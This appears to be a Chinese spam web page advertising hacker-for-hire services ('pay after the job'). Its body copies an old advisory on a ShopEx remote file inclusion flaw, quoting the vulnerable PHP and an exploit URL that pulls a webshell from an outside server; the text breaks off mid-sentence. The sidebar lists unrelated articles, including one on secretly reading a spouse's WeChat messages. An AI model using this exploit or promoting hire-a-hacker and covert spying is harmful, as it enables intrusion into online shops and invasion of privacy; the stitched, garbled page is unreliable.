黑客接单 无定金 先办事后付款的黑客qq
每日好文
| 信息来源:B.S.T漏洞平台:SHOPEX危害程度:★★★★☆关于ShopEx:ShopEx是 *** 购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。漏洞原理:看这里:/shop/npsout_reply.php include_once($INC_SYSHOMEDIR."include/PayFunction.php");//=========================== 把商家的相关信息返回去 =======================//接收组件的加密$OrderInfo = $_POST[OrderMessage]; //订单加密信息$signMsg = $_POST[Digest]; //密匙$m_id = $_POST[m_id];//=========================== 开始加密 ====================================//检查签名$shopPayment = newclass("shopPayment");$key = $shopPayment->getKey($INC_SHOPID, $m_id, "NPS_OUT");$digest = md5($OrderInfo.$key);//var_dump($_POST);if ($digest == $signMsg){//将HEX还原成字符$OrderInfo = HexToStr($OrderInfo);//DES解密$recovered_message = des($key, $OrderInfo, 0, 1, null);//echo "DES Test Decrypted: " . $recovered_message;$orderArray = split([|],$recovered_message);$m_id = $orderArray[0];$m_orderid = $orderArray[1];$m_oamount = $orderArray[2];$m_ocurrency = $orderArray[3];$m_url = $orderArray[4];// m_txcode = array[5];$m_language = $orderArray[5];$s_name = $orderArray[6];$s_addr = $orderArray[7];$s_postcode = $orderArray[8];$s_tel = $orderArray[9];$s_eml = $orderArray[10];$r_name = $orderArray[11];$r_addr = $orderArray[12];$r_postcode = $orderArray[13];$r_tel = $orderArray[14];$r_eml = $orderArray[15];$m_ocomment = $orderArray[16];$modate = $orderArray[17];$Status = $orderArray[18];if ($Status == 2){$Order = newclass("Order");$Order->shopId = $INC_SHOPID;$Order->payid = $m_orderid;$arr_paytime = getUnixtime(); //支付时间$Order->onlinePayed($arr_paytime[0], $arr_paytime[1]);$tmp_orderno = $Order->getorderidbyPayid($Order->payid); //拿出商店订单号$state = 2 ;$strinfo = $PROG_TAGS["ptag_1334"];}else{$state = 1 ;$strinfo = $PROG_TAGS["ptag_1335"];}}else{$state = 0 ;$strinfo = $PROG_TAGS["ptag_1336"];}Header("Location: ./index.php?gOo=pay_reply.dwt&orderid=".$tmp_orderno."&state=".$state."&strinfo=".urlencode($strinfo));?>假设在 http://www.sagi.net.cn 根目录下有个include文件夹里面有PayFunction.php文件(这是我们自己构造的,当然文件的内容可是小马也可是大马 呵呵)我们用如下 *** 就可以利用之http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn简单的说远程攻击者可以利用漏洞以WEB进程权限执行任意PHP命令。具体情节是npsout_reply.php脚本对用户提交的npsout_root_path参数缺少过滤指定远程服务器上的任意文件作为包含对象,可导致以WEB权限执行任意PHP代码漏洞实战:构 |
不能说的xs
相关文章
word样本模板在哪里
各位好!,我是产品经理,所述难题将由我来为大伙儿开展解释。 word样版模版在“刚开始”里,方式 以下: 1、开启Word文本文档,点一下刚开始; 2、在款式选择区中点一下款式按键...
怎样才能查到我老公的微信聊天信息
初夏,阳光充足,炎热的天气非常适合带宝宝去避暑旅行,想必很多父母都计划过家庭旅行,但宝宝的体质明显弱于父母,旅行对宝宝的抵抗力是一个挑战。为了宝宝旅行的安全和健康,小面友谊长存的小编建议父母在出行前服...
网页排版布局框架怎么样(网页排版布局原则及
像传统的报刊杂志编辑一样,我们可以将网页看作一张报纸或一本杂志来进行排版布局。虽然网页技术的发展更关注新技术的应用和新模式的推广,但固定的网页版面设计布局依然是必须学习和掌握的。网页布局的基本原理是共...
眼袋怎么快速消除?5个小妙招轻松消除
在这个人人都爱美的时代,大家都希望自己能够青春永驻,有不少人会觉得眼袋是一种衰老表现,但其实暂时性的眼袋产生是和睡眠不充足,过敏,大哭等等因素是有关系的,而讲眼袋消除是人们迫切想要知道的一个问题,如果...
外媒:伊朗实施将浓爱国者国际化联盟缩铀丰度提高至20%的措施
中新网1月4日电 据法新社援引伊朗媒体报道,伊朗已开始在福尔多核设施,实施将浓缩铀丰度提高至20%的措施。 据报道,伊朗政府发言人阿里·拉比(Ali Rabiei)4日表示,“已经在福尔多核...
微信钱包明明是虚拟的,黑客为什么不敢攻击?_当我们
微信钱包明明是虚拟的,黑客为什么不敢攻击?微信作为现在人们生活中必不可少的软件,微信钱包也因为微信的流量成为了和支付宝平分移动支付的网络巨头,但是有很多人都不明白,明明微信钱包是虚拟的网络产品,为什么...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!